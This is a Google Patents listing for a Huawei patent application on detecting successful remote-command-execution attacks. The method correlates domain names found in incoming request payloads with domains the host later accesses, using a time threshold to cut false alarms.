CN117061139A - Attack detection method and device - Google Patents

Attack detection method and device Download PDF

Info

Publication number
CN117061139A
CN117061139A CN202210493521.XA CN202210493521A CN117061139A CN 117061139 A CN117061139 A CN 117061139A CN 202210493521 A CN202210493521 A CN 202210493521A CN 117061139 A CN117061139 A CN 117061139A
Authority
CN
China
Prior art keywords
host
domain name
log
request message
detection device
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN202210493521.XA
Other languages
Chinese (zh)
Inventor
杨浩鹏
王飞跃
李强
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Huawei Technologies Co Ltd
Original Assignee
Huawei Technologies Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Huawei Technologies Co Ltd filed Critical Huawei Technologies Co Ltd
Priority to CN202210493521.XA priority Critical patent/CN117061139A/en
Priority to PCT/CN2023/087493 priority patent/WO2023216792A1/en
Publication of CN117061139A publication Critical patent/CN117061139A/en
Pending legal-status Critical Current

Links

Classifications

    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1416Event detection, e.g. attack signature detection
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L43/00Arrangements for monitoring or testing data switching networks
    • H04L43/04Processing captured monitoring data, e.g. for logfile generation
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1425Traffic logging, e.g. anomaly detection
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1433Vulnerability analysis
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L9/00Cryptographic mechanisms or cryptographic arrangements for secret or secure communications; Network security protocols
    • H04L9/40Network security protocols

Abstract

The embodiment of the application discloses a method for detecting attacks, which comprises the steps that a detection device acquires a weblog of a host and a host log of the host, wherein the weblog of the host comprises parameter information of a first request message, the first request message is a request message received by the host from other devices, and the parameter information of the first request message comprises a first domain name included in a load part of the first request message. The host log of the host includes at least one domain name accessed by the host. The detection device matches the first domain name with the at least one domain name. If the at least one domain name comprises the first domain name, the detection device generates alarm information for indicating that the host is attacked. Therefore, the method and the device for detecting the attack of the host can accurately detect the attack of the host and avoid generating a large number of false alarms by combining the first domain name in the first request message and at least one domain name accessed by the host to determine whether the attack of the host is successful or not and generating alarm information only when the attack is executed successfully.

Description

Attack detection method and device
Technical Field
The present application relates to the field of information security, and in particular, to a method and apparatus for detecting an attack.
Background
An attacker typically uses vulnerabilities to invade a host, and some vulnerabilities allow the attacker to directly execute system commands on the host, which is a relatively high-hazard vulnerability and relatively widely utilized by the attacker. Such vulnerabilities include, for example, remote command execution (Remote Command Execution, RCE) vulnerabilities. Aiming at the attack behavior, the traditional technology compiles corresponding detection rules by manually analyzing the characteristics of the loopholes, and configures the detection rules in security equipment such as a firewall. The security device performs feature matching on the flowing traffic based on the detection rules, and generates an alarm if the traffic is being matched, to indicate that an attack event has occurred.
The conventional technology often has the phenomenon of lower accuracy, and how to accurately detect the attack initiated by the attacker based on the loopholes is a problem yet to be solved at present.
Disclosure of Invention
The embodiment of the application provides a method and a device for detecting attacks, which can accurately detect the attacks initiated by vulnerabilities based on specific categories.
In a first aspect, an embodiment of the present application provides a method for detecting an attack, where the method is applied to a detection device. In one example, the detection device obtains a weblog of a host and a host log of the host, where the weblog of the host includes parameter information of a first request message, where the first request message is a request message received by the host from another device, and the parameter information of the first request message includes a first domain name included in a payload portion of the first request message. The host log of the host includes at least one domain name accessed by the host. After the detection device obtains the weblog of the host and the host log of the host, the first domain name included in the weblog is matched with at least one domain name in the host log. If at least one domain name in the host log includes a first domain name in the weblog, then the following is stated: the host receives a first request message including a first domain name, and the host accesses the first domain name. For this case, the host is considered to have access to the first domain name in the first request message based on the first request message. In other words, this situation indicates that the host has a vulnerability that the attacker is attempting to exploit through the first request message (such vulnerability allows the attacker to execute the system commands directly on the host), and that the attacker is successful in executing the attack launched against the vulnerability. In this case, the detection device generates alarm information indicating that the host is attacked. It can be seen that the present solution combines the first domain name included in the first request message and at least one domain name accessed by the host to determine whether the attack to the host is successful, and generates the alarm information only when the execution of the attack is successful. Accordingly, if at least one domain name in the host log does not include the first domain name included in the weblog, it is stated that the attacker does not perform successfully although attempting to launch the attack with the vulnerability, and in this case, no alert is generated. Therefore, the scheme can accurately detect the attack on the host computer, and avoid generating a large number of false alarms.
In one possible implementation, the parameter information of the first request packet further includes a time when the host receives the first request packet. The host log of the host further comprises a time corresponding to each domain name in the at least one domain name, wherein the time corresponding to a second domain name in the host log is the time when the host accesses the second domain name, and the at least one domain name comprises the second domain name. For this case, the detection device can determine more information related to the first request message based on the weblog of the host, and the detection device can determine a time when the host accesses the at least one domain name based on the host log of the host.
In one possible implementation manner, in order to improve accuracy of detecting an attack, in a case that a weblog received by a detecting device includes a time when a host receives a first request packet, and a host log received by the detecting device includes a time when each domain name in the at least one domain name corresponds to each other, the detecting device further determines whether a time when the first domain name included in the host log corresponds to the first domain name is later than a time when the host receives the first request packet, except that the first domain name is matched with the at least one domain name. If the moment corresponding to the first domain name in the host log is later than the moment when the host receives the first request message, the situation that the host receives the first request message first and then accesses the first domain name is indicated, at this moment, the host is confirmed to be attacked, and specifically, it is determined that an attacker uses the first request message to attack the host. For this case, the detection device generates the aforementioned alert information indicating that the host is attacked.
In one possible implementation, it is considered that for an attack packet, there is a certain time difference between the moment the host receives the attack packet and the moment the host accesses the domain name in the attack packet, which is generally within a certain range. Therefore, in one example, after determining that the at least one domain name includes the first domain name and the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request packet, the detecting device further determines whether a difference between the time corresponding to the first domain name included in the host log and the time when the host receives the first request packet is less than or equal to a preset time threshold. And when the difference between the moment corresponding to the first domain name and the moment when the host receives the first request message is smaller than or equal to a preset time threshold, determining that the host is attacked, and specifically determining that an attacker uses the first request message to attack the host. For this case, the detection device generates the aforementioned alert information indicating that the host is attacked.
In one possible implementation manner, the foregoing detecting device is integrated in the host, and for this case, the detecting device obtains a weblog of the host, that is: the host computer obtains its own weblog. In one example, a host may obtain a weblog of the host through a hook (hook) web function. Correspondingly, the detection device acquires a host log of the host, namely: the host acquires its own host log. In one example, the host obtains its own host log by executing a process through a shell in the hook operating system.
In one possible implementation manner, the detection device is another independent computer device connected with the host in a network manner, and for this case, a specific implementation manner of the detection device to obtain the weblog of the host is as follows: and the detection equipment receives the weblog sent by the security equipment, and the security equipment is deployed between the other equipment and the host. Correspondingly, the specific implementation manner of acquiring the host log of the host by the detection device is as follows: and the detection equipment receives the host log sent by the host.
In one possible implementation, the detection device, the security device, and the host are located within the same local area network when the detection device is another independent computer device that is in network connection with the host. For this case, the host and security device have access to the detection device, while other devices outside the local area network have no access to the detection device.
In one possible implementation, the detection device is deployed in the internet. For this case, the host and the security device have access to the detection device, as well as other devices.
In one possible implementation, after the detection device generates the alarm information, the alarm information is further output, so that an operation and maintenance person or other device (such as a management device) can determine that the host is attacked, and accordingly, processing measures are taken. And outputting the alarm information.
In one possible implementation manner, in order to make the operation and maintenance personnel or the management device learn more information related to the attack message, the alarm information further includes more information related to the first request message. As an example, if the parameter information of the first request packet included in the weblog of the host acquired by the detection device further includes a load portion of the first request packet and/or a destination IP address of the first request packet, in this case, the alarm information also includes the load portion and/or the destination IP address of the first request packet included in the parameter information correspondingly. In yet another example, the host log of the host acquired by the detection device further includes an IP address of the host and/or a log record corresponding to each domain name in the at least one domain name. For this case, the alert information further includes an IP address of the host and/or a log record corresponding to the first domain name included in the host log.
In one possible implementation, the first request message is a transmission control protocol (transmission control protocol, TCP) request message based on an attack message. For the situation, by using the scheme, whether the attack to the host computer by using the TCP request message is successful or not can be accurately determined, and the alarm information is generated only when the attack execution is successful.
In a second aspect, an embodiment of the present application provides a system for detecting an attack, the system including: the system comprises a security device, a host and a detection device; the security device is configured to send a weblog of the host to the detection device, where the weblog includes parameter information of a first request packet, where the first request packet is a packet received by the host from another device, and the parameter information includes a first domain name included in a payload portion of the first request packet; the host is configured to send a host log of the host to the detection device, where the host log includes at least one domain name accessed by the host; the detection device is configured to receive the weblog sent by the security device, and receive the host log sent by the host, and generate alarm information when the at least one domain name includes the first domain name, where the alarm is used to indicate that the host is attacked. The scheme combines a first domain name included in the first request message and at least one domain name accessed by the host to determine whether the attack to the host is successful or not, and generates alarm information under the condition that the attack execution is successful. Accordingly, if at least one domain name in the host log does not include the first domain name included in the weblog, it is stated that the attacker does not perform successfully although attempting to launch the attack with the vulnerability, and in this case, no alert is generated. Therefore, the scheme can accurately detect the attack on the host computer, and avoid generating a large number of false alarms.
In a possible implementation manner, the parameter information further includes a time when the host receives the first request packet, the host log further includes a time when each domain name in the at least one domain name corresponds to each other, where a time when a second domain name in the host log corresponds to a time when the host accesses the second domain name, and the at least one domain name includes the second domain name.
In one possible implementation, the detection device is configured to: and generating the alarm information under the condition that the at least one domain name comprises the first domain name and the moment corresponding to the first domain name, which is included in the host log, is later than the moment when the host receives the first request message.
In one possible implementation, the detection device is configured to: and generating the alarm information under the condition that the at least one domain name comprises the first domain name, the moment corresponding to the first domain name included in the host log is later than the moment when the host receives the first request message, and the difference between the moment corresponding to the first domain name and the moment when the host receives the first request message included in the host log is smaller than or equal to a preset time threshold.
In one possible implementation, the host obtains a host log of the host through a shell execution process in a hook operating system.
In one possible implementation, the detection device, the security device, and the host are located within the same local area network.
In one possible implementation, the detection device is deployed in the internet.
In a possible implementation, the detection device is further configured to: and outputting the alarm information.
In a possible implementation manner, the parameter information further includes the payload portion and/or a destination IP address of the first request packet, and the alarm information includes the payload portion and/or the destination IP address of the first request packet included in the parameter information.
In a possible implementation manner, the host log further includes an IP address of the host and/or a log record corresponding to each domain name in the at least one domain name, and the alarm information includes an IP address of the host and/or a log record corresponding to the first domain name included in the host log.
In one possible implementation, the first request message is a TCP-based request message.
In a third aspect, an embodiment of the present application provides a detection apparatus, where the detection apparatus is integrated in a host, the detection apparatus includes: the system comprises an acquisition module, a processing module and a processing module, wherein the acquisition module is used for acquiring a weblog of the host, the weblog comprises parameter information of a first request message, the first request message is a request message received by the host from other equipment, and the parameter information comprises a first domain name included in a load part of the first request message; the acquisition module is further configured to acquire a host log of the host, where the host log includes at least one domain name accessed by the host; and the processing module is used for generating alarm information if the at least one domain name comprises the first domain name, wherein the alarm information is used for indicating that the host is attacked.
In one possible implementation manner, the obtaining module is configured to obtain a weblog of the host through hooking a hook network function, and obtain a host log of the host through shell execution in a hook operating system.
In a fourth aspect, an embodiment of the present application provides a detection apparatus, applied to a detection device, where the apparatus includes: the system comprises an acquisition module, a processing module and a processing module, wherein the acquisition module is used for acquiring a weblog of a host, the weblog comprises parameter information of a first request message, the first request message is a request message from other equipment, which is received by the host, and the parameter information comprises a first domain name included in a load part of the first request message; the acquisition module is further configured to acquire a host log of the host, where the host log includes at least one domain name accessed by the host; and the processing module is used for generating alarm information if the at least one domain name comprises the first domain name, wherein the alarm is used for indicating that the host is attacked.
In a possible implementation manner, the parameter information further includes a time when the host receives the first request packet, the host log further includes a time when each domain name in the at least one domain name corresponds to a time when the host accesses the second domain name, and the at least one domain name includes the second domain name.
In one possible implementation manner, if the at least one domain name includes the first domain name, the processing module is configured to: and if the at least one domain name comprises the first domain name and the moment corresponding to the first domain name in the host log is later than the moment when the host receives the first request message, generating the alarm information.
In one possible implementation manner, if the at least one domain name includes the first domain name and the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request packet, the processing module is configured to: and if the at least one domain name comprises the first domain name, the moment corresponding to the first domain name included in the host log is later than the moment when the host receives the first request message, and the difference between the moment corresponding to the first domain name and the moment when the host receives the first request message included in the host log is smaller than or equal to a preset time threshold, generating the alarm information.
In one possible implementation manner, the detection device is integrated in the host, and the obtaining module is configured to: obtaining a weblog of the host through a hook network function; and acquiring a host log of the host through a shell execution process in a hook operating system.
In a possible implementation manner, the detection device is another independent computer device connected to the host through a network, and the acquiring module is configured to: receiving the weblog sent by a security device, wherein the security device is deployed between the other devices and the host; and receiving the host log sent by the host.
In one possible implementation, the detection device, the security device, and the host are located within the same local area network.
In one possible implementation, the detection device is deployed in the internet.
In one possible implementation, the processing module is further configured to: and outputting the alarm information.
In a possible implementation manner, the parameter information further includes the payload portion and/or a destination IP address of the first request packet, and the alarm information further includes the payload portion and/or the destination IP address of the first request packet included in the parameter information.
In a possible implementation manner, the host log further includes an IP address of the host and/or a log record corresponding to each domain name in the at least one domain name, and the alarm information further includes an IP address of the host and/or a log record corresponding to the first domain name included in the host log.
In a fifth aspect, an embodiment of the present application provides an apparatus. The apparatus includes a processor and a memory. The memory is used to store instructions or computer programs. The processor is configured to execute the instructions or computer program in the memory to perform the method of any one of the first aspect above.
In a sixth aspect, embodiments of the present application provide a computer readable storage medium comprising instructions or a computer program which, when run on a computer, causes the computer to perform the method of any one of the first aspects above.
In a seventh aspect, embodiments of the present application provide a computer program product comprising instructions or a computer program which, when run on a computer, cause the computer to perform the method of any of the first aspects above.
Drawings
In order to more clearly illustrate the embodiments of the present application or the technical solutions in the prior art, the drawings that are required to be used in the embodiments or the description of the prior art will be briefly described below, and it is obvious that the drawings in the following description are only some embodiments described in the present application, and other drawings may be obtained according to the drawings without inventive effort to those skilled in the art.
FIG. 1 is a schematic diagram of a process for launching an exemplary application scenario for an attack using a specific class of vulnerabilities;
fig. 2a is a schematic diagram of an exemplary application scenario provided in an embodiment of the present application;
FIG. 2b is a schematic diagram of another exemplary application scenario provided by an embodiment of the present application;
FIG. 2c is a schematic diagram of yet another exemplary application scenario provided by an embodiment of the present application;
fig. 3 is a schematic flow chart of a method for detecting attack according to an embodiment of the present application;
fig. 4 is a signaling interaction diagram of a method for detecting attack according to an embodiment of the present application;
fig. 5 is a schematic structural diagram of a detection device according to an embodiment of the present application;
fig. 6 is a schematic structural diagram of an apparatus according to an embodiment of the present application.
Detailed Description
The embodiment of the application provides a method and a device for detecting attacks, which can improve the detection accuracy of the attacks initiated by utilizing specific types of vulnerabilities. Wherein the specific class of vulnerabilities includes vulnerabilities that allow an attacker to execute system commands directly on the host.
For easy understanding, the attack initiated by the specific type of vulnerability will be briefly described with reference to the accompanying drawings.
Referring to FIG. 1, a schematic diagram of a process for launching an attack using a specific class of vulnerabilities is shown. An attacker sends an attack message to the host containing an attack order, which in one example is downloading malware stored on domain name a to be executed locally to the host. Alternatively, the attack packet is a TCP request packet.
After the service with the vulnerability on the host receives the attack message, the vulnerability utilization is triggered, and after the vulnerability utilization is triggered, the service with the vulnerability calls a function in an operating system of the host to execute an attack command in the attack message. Further: the operating system sends an access request to domain name a and downloads the malware stored in some file directory of domain name a to the host locally and executes the malware on the host.
Aiming at the attack behavior shown in fig. 1, the conventional technology writes corresponding detection rules by manually analyzing the characteristics of the loopholes, and configures the detection rules in security devices such as a firewall. The security device performs feature matching on the flowing traffic based on the detection rules, and generates an alarm if the traffic is being matched, to indicate that an attack event has occurred. For example, in the scenario shown in fig. 1, the security device is disposed between an attacker and a host, and when the attacker sends the attack packet to the host, the security device performs feature matching on the attack packet. Alternatively, the security device is disposed between the host and the device corresponding to the domain name a, and when the host sends an access request to the domain name a, the security device performs feature matching on the access request. Similarly, when the host downloads malware from a file directory in domain name a, the security device performs feature matching on traffic that includes the malware.
However, on the one hand, since the detection rules are summarized based on the characteristics of the vulnerabilities, and the number and the types of the vulnerabilities are large, an analyst cannot analyze all the vulnerabilities one by one, and if an attacker initiates an attack by using the vulnerability which the analyst has not analyzed, the security device cannot detect the attack initiated by the attacker. Currently, the time from the discovery of the vulnerability to the attack by the attacker using the vulnerability is shorter and shorter, for example, more and more vulnerabilities are less than 1 day apart from the discovery to the attack by the attacker. This vulnerability is also known as a "zero-day vulnerability," also known as a zero-time difference attack, i.e., a security vulnerability that is exploited immediately after being discovered. Such attacks tend to be very bursty and damaging.
On the other hand, in some scenarios, although the host receives the attack packet, the host does not execute the attack order in the attack packet, namely: the attacker does not succeed in the attack. For this case, after the security device deployed between the attacker and the host performs feature matching on the flow flowing through based on the detection rule, an alarm is still generated due to the detection of the attack packet, so as to cause a false alarm.
In order to solve the above problems, the embodiment of the present application provides a method for detecting an attack, which can more accurately detect an attack initiated by an attacker on a host based on the specific type of vulnerability, and the scheme can also reduce false alarms.
Before introducing the method and system for detecting an attack provided by the embodiment of the present application, an application scenario of the method for detecting an attack provided by the embodiment of the present application is first described.
Referring to fig. 2a, a schematic diagram of an exemplary application scenario provided by an embodiment of the present application is shown. In the scenario shown in fig. 2a, the host 101 is connected to the network through other network devices, and an attack packet sent by an attacker is forwarded to the host 101 through other network devices (e.g., switches, routers, etc.). The host 101 is provided with a host agent (agent), the host agent is provided with a weblog acquisition module and a host log acquisition module, the host 101 acquires a weblog of the host by using the weblog acquisition module, acquires a host log of the host by using the host log acquisition module, and determines whether the host is attacked or not based on the weblog and the host log.
Wherein: the host agent is a component running on the host, in one example, a host intrusion detection system (host intrusion detection system, HIDS) agent, and in yet another example, a network intrusion detection system (network intrusion detection system, NIDS) agent.
Referring to fig. 2b, which is a schematic diagram of another exemplary application scenario provided by an embodiment of the present application, in the scenario shown in fig. 2b, a host 102 is connected to a network through a security device 103, and an attack packet sent by an attacker is forwarded to the host 102 through the security device 103. Optionally, there are also one or more network forwarding devices between the attacker and the security device, such as routers, security gateways, etc. The host 102 and the security device 103 also interact with the integrated analysis device 104.
The host 102 is provided with a host agent, the host agent is provided with a host log acquisition module, and the host 102 acquires a host log of the host 102 by using the host log acquisition module and sends the host log to the comprehensive analysis device 104. In addition, the security device 103 includes a weblog acquisition module, and the security device 103 acquires a weblog of the host 102 using the weblog acquisition module and transmits the weblog to the comprehensive analysis device 104. The integrated analysis device 104 determines whether the host is attacked based on the received weblog and the host log. Wherein: the host 102, the security device 103 and the analysis-by-synthesis device 104 are located within the same local area network. For this case, the integrated analysis device 104 is accessed in the host 102 and the secure device 103 by an internet protocol (Internet Protocol, IP) address of the secure analysis device 104, wherein the IP address of the integrated analysis device 104 is preconfigured on the host 102 and the secure device 103. When the host 102, the security device 103, and the integrated analysis device 104 are located within the same local area network, other devices outside the local area network cannot access the integrated analysis device 104.
The protocol used for data interaction between the host 102 and the analysis-by-synthesis device 104 is not particularly limited by the present application. Protocols used for data interaction between the host 102 and the analysis-by-synthesis device 104 include, but are not limited to: TCP and hypertext transfer protocol (hyper text transfer protocol, HTTP). Similarly, protocols used for data interaction between the security device 103 and the analysis-by-synthesis device 104 include, but are not limited to: TCP and HTTP. Wherein the data interacted between the host 102 and the integrated analysis device 104 comprises the aforementioned host log and the data interacted between the security device 103 and the integrated analysis device 104 comprises the aforementioned web log.
The integrated analysis device 104 referred to herein is, for example, a device running extended detection and response (extended detection and response, XDR) software, and is, for example, a device running security information event management (security information event management, SIEM) software.
Referring to fig. 2c, which is a schematic diagram of still another exemplary application scenario provided by an embodiment of the present application, in the scenario shown in fig. 2c, a host 102 is connected to a network through a security device 103, and an attack packet sent by an attacker is forwarded to the host 102 through the security device 103. The host 102 and the security device 103 also interact with the cloud analysis device 105.
The host 102 is provided with a host agent, the host agent is provided with a host log obtaining module, and the host 102 obtains a host log of the host 102 by using the host log obtaining module and sends the host log to the cloud analysis device 105. In addition, the security device 103 includes a weblog obtaining module, and the security device 103 obtains a weblog of the host 102 by using the weblog obtaining module and sends the weblog to the cloud analysis device 105. Cloud analysis device 105 determines whether the host is attacked based on the received weblog and host log. Wherein:
the host 102 and the security device 103 are located in the same local area network, and the cloud analysis device 105 is deployed in the internet. For this case, the cloud analytics device 105 provides a subscription service that is accessed by any other device, such as the host 102 and the security device 103, through a uniform resource location system (uniform resource locator, URL), web page (web) application program interface (application programming interface, API), or domain name.
The protocol used for data interaction between the host 102 and the cloud analysis device 105 is not particularly limited by the present application. Protocols used for data interaction between host 102 and cloud analytics device 105 include, but are not limited to: TCP, HTTP, and hypertext transfer protocol over secure sockets layer (hyper text transfer protocol over secure socket layer, HTTPs). Similarly, protocols used for data interaction between the security device 103 and the cloud analysis device 105 include, but are not limited to: TCP, HTTP, and HTTPs. Wherein, the data interacted between the host 102 and the cloud analysis device 105 includes the aforementioned host log, and the data interacted between the security device 103 and the cloud analysis device 105 includes the aforementioned weblog.
Next, a method for detecting an attack provided by the application embodiment will be described with reference to fig. 3 and 4.
Referring to fig. 3, fig. 3 is a flow chart of an attack detection method according to an embodiment of the present application. Alternatively, the method of detecting an attack shown in fig. 3 is performed by a detection device.
When the method shown in fig. 3 is applied to the scenario shown in fig. 2a above, the detection device is the host 101 shown in fig. 2a, when the method shown in fig. 3 is applied to the scenario shown in fig. 2b above, the detection device is the integrated detection device 104 shown in fig. 2b, and when the method shown in fig. 3 is applied to the scenario shown in fig. 2c above, the detection device is the cloud analysis device 105 shown in fig. 2 c.
The method shown in fig. 3 comprises steps S101-S103.
S101: the method comprises the steps that detection equipment obtains a weblog of a host, wherein the weblog comprises parameter information of a first request message, the first request message is a request message received by the host from other equipment, and the parameter information comprises a first domain name included in a load part of the first request message.
When the method shown in fig. 3 is applied in the scenario shown in fig. 2a, the detection device is integrated in the host 101. For this case, the specific implementation manner of S101 is: the host 101 acquires its own weblog. In one example, the host 101 is able to obtain the weblog through a hook network function. In one example, a host monitors a protocol stack function library for a call to a network data processing function for processing messages received and transmitted by a network interface using a hook mechanism, and obtains a first request message processed by the network processing function when the network data processing function is called. Then, the host 101 analyzes the first request message, so as to obtain a load in the first request message, and further, analyzes the load to obtain a first domain name.
The embodiment of the present application is not particularly limited to a specific implementation manner in which the host 101 analyzes to obtain the load and the host 101 analyzes to obtain the first domain name from the load. In one example, when the first request message is a TCP request message, the host 101 parses the first request message using a message format specified in a request for comments (request for comments, RFC) 793, thereby obtaining a payload of the first request message. After obtaining the load of the first request packet, the host 101 uses regular expression to analyze and determine whether the domain name exists in the load according to the definition and constraint of the domain name in RFC1035, and extracts the first domain name included in the load when determining that the domain name exists in the load.
The embodiment of the application is not particularly limited to the other devices, and the other devices may be network devices or user devices, where the user devices include, but are not limited to, terminal devices and servers.
In the embodiment of the present application, the parameter information of the first request message refers to information of parameters related to the first request message, which is extracted from the content of the first request message or obtained from context information when the first request message is received. The parameter information of the first request message includes other information besides the first domain name. In one example, the parameter information further includes a time at which the host receives the first request message. In yet another example, the parameter information further includes a payload portion of the first request and/or a destination IP address of the first request message.
When the method shown in fig. 3 is applied to the scenario shown in fig. 2b or fig. 2c, the specific implementation manner of S101 is: receiving the weblog sent by the security device 103, wherein the security device 103 is disposed between the other devices and the host, namely: when the other device sends the first request message to the host 102, the first request message needs to be forwarded through the security device 103. The security devices 103 mentioned herein include, but are not limited to, devices such as firewalls that are deployed with security policies.
In one example, after the secure device 103 obtains the first request packet, the secure device obtains parameter information of the first request packet based on the first request packet, and further sends the parameter information of the first request packet to the detecting device.
The specific implementation of the detection device obtaining the parameter information of the first request message based on the first request message is similar to the specific implementation of the host 101 obtaining the parameter information of the first request message based on the first request message, so the description of the specific implementation of the detection device obtaining the parameter information of the first request message based on the first request message may refer to the description part for obtaining the parameter information of the first request message by the host, and will not be repeated here.
S102: the detection device obtains a host log of the host, wherein the host log comprises at least one domain name accessed by the host.
Optionally, in one example, the detection device obtains a host log of the host over a period of time, e.g., the detection device obtains a host log over a period of time after receiving the first request message from the host. The embodiment of the application is not particularly limited to the certain time period, and the time period corresponding to the certain time period is shorter in order to improve the attack detection efficiency. For example, the detection device obtains a host log within 10 seconds after receiving the first request message from the host.
When the method shown in fig. 3 is applied in the scenario shown in fig. 2a, the detection device is integrated with the host 101. For this case, the specific implementation of S102 is: the host 101 acquires its own host log. In one example, host 101 obtains its own host log by executing a process through a shell in the hook operating system. In one example, the host 101 monitors shell execution in the operating system using a hook mechanism to obtain its own shell execution log. And then, according to the definition and constraint of the domain name in RFC1035, judging whether the domain name exists in each shell execution log by using regular expression analysis, and if so, storing the domain name so as to obtain a host log comprising at least one domain name accessed by the host.
In an embodiment of the present application, the host log includes information related to the host and domain names accessed by the host. In one example, the host log includes, in addition to the at least one domain name, a time of day corresponding to each of the at least one domain name. And for a second domain name in the at least one domain name, the time corresponding to the second domain name refers to the time when the host accesses the second domain name. In yet another example, the host log further includes a log record corresponding to an IP address of the host and/or each domain name of the at least one domain name, respectively.
When the method shown in fig. 3 is applied to the scenario shown in fig. 2b or fig. 2c, the specific implementation manner of S102 is: the host log sent by the host 102 is received. In one example, after receiving the first request message, the host 102 performs the step of obtaining a host log to obtain a host log of itself, and further sends the host log of itself to the detection device.
For a specific implementation of the host 102 obtaining the host log, reference may be made to the relevant description section of "the host 101 obtains its host log" in S101, which is not described in detail herein.
In addition, the embodiment of the present application is not particularly limited to the execution sequence between S101 and S102, S101 may be executed before S102, S101 may be executed between S102 and S103, and S101 may be executed simultaneously with S102.
S103: and if the at least one domain name comprises the first domain name, the detection equipment generates alarm information, wherein the alarm information is used for indicating that the host is attacked.
In other words, the alert information indicates that the attack performed by the first request message was successful.
After the detection device obtains the weblog and the host log, matching a first domain name in the weblog with at least one domain name in the host log, and if the at least one domain name in the host log comprises the first domain name, the detection device indicates that the host receives a first request message comprising the first domain name, and the host accesses the first domain name. For this case, the host is considered to have access to the first domain name in the first request message based on the first request message. Thus, for this case, the detection device determines that the host is attacked, and thus, the detection device generates alarm information indicating that the host is attacked. And for the case where at least one domain name in the host log does not include the first domain name in the weblog, it is explained that the attacker, although attempting to launch the attack with the vulnerability, does not perform successfully, in which case no alert is generated.
In one example, after the detection device generates the alert information, the alert information is further output to facilitate an operation and maintenance person or other device (e.g., management device) to determine that the host is attacked, thereby taking corresponding processing measures.
The embodiment of the application is not particularly limited to the specific implementation manner in which the detection device outputs the alarm information, in one example, the detection device displays the alarm information on a display screen, and in another example, the detection device sends the alarm information to other devices, such as a network management device.
In the embodiment of the application, in order to enable the operation and maintenance personnel or the management equipment to acquire more information related to the attack message, the alarm information also comprises more information related to the first request message.
As can be seen from the foregoing, in one example, the parameter information of the first request packet included in the weblog further includes a load portion of the first request packet and/or a destination IP address of the first request packet, and in this case, the alarm information also includes the load portion and/or the destination IP address of the first request packet included in the parameter information correspondingly. For example, the parameter information includes the load part, and the alarm information includes the load part; for another example, if the parameter information includes a destination IP address of the first request packet, the alarm information includes the destination IP address of the first request packet. In yet another example, the host log further includes a log record corresponding to an IP address of the host and/or each domain name of the at least one domain name, respectively. For this case, the alert information further includes an IP address of the host and/or a log record corresponding to the first domain name included in the host log. For example, if the host log includes an IP address of the host, the alert information includes the IP address of the host; for another example, if the host log includes a log record corresponding to each domain name in the at least one domain name, the alarm information includes a log record corresponding to the first domain name.
As can be seen from the description of the weblog and the host log above: the weblog further includes a time when the host receives the first request message, and the host log further includes a time corresponding to each domain name in the at least one domain name. For this case, consider that for an attack message, the host receives the attack message at a time earlier than the time the host accesses the domain name included in the attack message.
Therefore, in order to further improve the accuracy of detecting the attack, in one example, in S103, in addition to matching the first domain name with the at least one domain name, if the at least one domain name includes the first domain name, the detecting device further determines whether the time when the host receives the first request packet is earlier than the time when the host accesses the first domain name, that is: the detection device further judges whether the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message. If the moment corresponding to the first domain name in the host log is later than the moment when the host receives the first request message, the situation that the host receives the first request message first and then accesses the first domain name is indicated, at this moment, the host is confirmed to be attacked, and specifically, it is determined that an attacker uses the first request message to attack the host. For this case, the detection device generates the aforementioned alert information indicating that the host is attacked.
In yet another example, consider that for an attack packet, there is a time difference between the time the host receives the attack packet and the time the host accesses the domain name in the attack packet, which is typically within a certain range. In view of this, in one example, after determining that the at least one domain name includes the first domain name and the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request packet, the detection device further determines whether a difference between the time corresponding to the first domain name included in the host log and the time when the host receives the first request packet is less than or equal to a preset time threshold. And when the difference between the moment corresponding to the first domain name and the moment when the host receives the first request message is smaller than or equal to a preset time threshold, determining that the host is attacked, and specifically determining that an attacker uses the first request message to attack the host. For this case, the detection device generates the aforementioned alert information indicating that the host is attacked.
The embodiment of the present application is not particularly limited to the preset time threshold, and in one example, the preset time threshold is a relatively small value, for example, the preset time threshold is 10 seconds, considering that the time difference between the time when the host receives the attack packet and the time when the host accesses the domain name in the attack packet is generally relatively small. In addition, the preset time threshold value is set to be smaller, so that the efficiency of detecting the attack message can be improved, and accordingly, the attack message can be detected in time, and certain treatment measures can be taken in time. Illustrating: if the preset time threshold is set longer, for example, is set to 5 hours, after the host receives the first request message, the first domain name needs to be compared with the domain name accessed by the host within 5 hours, in other words, in some cases, it needs to wait 5 hours to determine whether the host is attacked.
